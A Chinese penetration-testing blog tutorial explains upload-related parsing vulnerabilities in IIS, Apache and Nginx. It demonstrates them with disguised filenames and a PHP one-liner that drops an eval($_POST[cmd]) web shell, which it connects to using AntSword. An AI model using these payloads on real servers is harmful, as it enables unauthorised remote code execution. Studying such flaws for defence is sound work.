• 欢迎访问行云博客,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入行云博客 QQ群
  • 本站广招各类优秀作者,详情可以加群联系
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏行云博客吧

中间件的解析漏洞详解及演示

web渗透 行云 4个月前 (08-19) 226次浏览 已收录 0个评论 扫描二维码

解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。

类型:

  1. IIS 5.x/6.0解析漏洞
  2. IIS 7.0/IIS 7.5/
  3. Nginx <0.8.3畸形解析漏洞
  4. Nginx <8.03 空字节代码执行漏洞
  5. Apache解析漏洞

中间件的解析漏洞详解及演示-行云博客

IIS5.x-6.x解析漏洞

利用方法

IIS6.0 默认的可执行文件除了asp还包含这三种

/sp.asa

/sp.cer

/sp.cdx

1.目录解析

/xx.asp/xx.jpg

2.文件解析

sp.asp;.jpg

第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

例如创建目录 sp.asp,那么

/sp.asp/1.jpg

将被当作asp文件来执行。假设黑客可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。

第二种,在IIS6.0下,分号后面的不被解析,也就是说

sp.asp;.jpg

会被服务器看成是sp.asp

Apache

漏洞原理

Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 sec.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把sec.php.owf.rar解析成php.

如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个sec.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀

其余配置问题导致漏洞

(1)如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。
(2)如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg,一样能以 php 方式执行。

IIS 7.0/IIS 7.5/nginx 0.8.3解析漏洞

在默认Fast-CGI开启状况下,黑客上传一个名字为sp.jpg,内容为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>

的文件,然后访问sp.jpg/.php,在这个目录下就会生成一句话木马 shell.php

Nginx <0.8.03 空字节代码执行漏洞

影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx在图片中嵌入PHP代码然后通过访问

xxx.jpg%00.php

来执行其中的代码

演示

IIS6.0解析漏洞

1.上传23.asa;jpg文件
中间件的解析漏洞详解及演示-行云博客

蚁剑连接成功

中间件的解析漏洞详解及演示-行云博客

2.将23.asa;jpg文件改名为23.jpg,并放到1.asp目录下访问,然后使用蚁剑连接

中间件的解析漏洞详解及演示-行云博客

Nginx 漏洞

上传一个图片马,里面含有代码

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>

该木马会在上传后,运用Apache的解析漏洞再次访问时生成一个shell.php木马
中间件的解析漏洞详解及演示-行云博客

访问该图片,并在末尾加上/.php
中间件的解析漏洞详解及演示-行云博客

生成shell.php
中间件的解析漏洞详解及演示-行云博客

蚁剑去连接该shell.php
中间件的解析漏洞详解及演示-行云博客

Apache解析漏洞

上传带一句话木马的1.php.q.w.d文件
中间件的解析漏洞详解及演示-行云博客

蚁剑连接
中间件的解析漏洞详解及演示-行云博客


行云博客 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。 本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。 如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我(admin@xy586.top)联系处理。敬请谅解!

喜欢 (0)
[行云博客]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址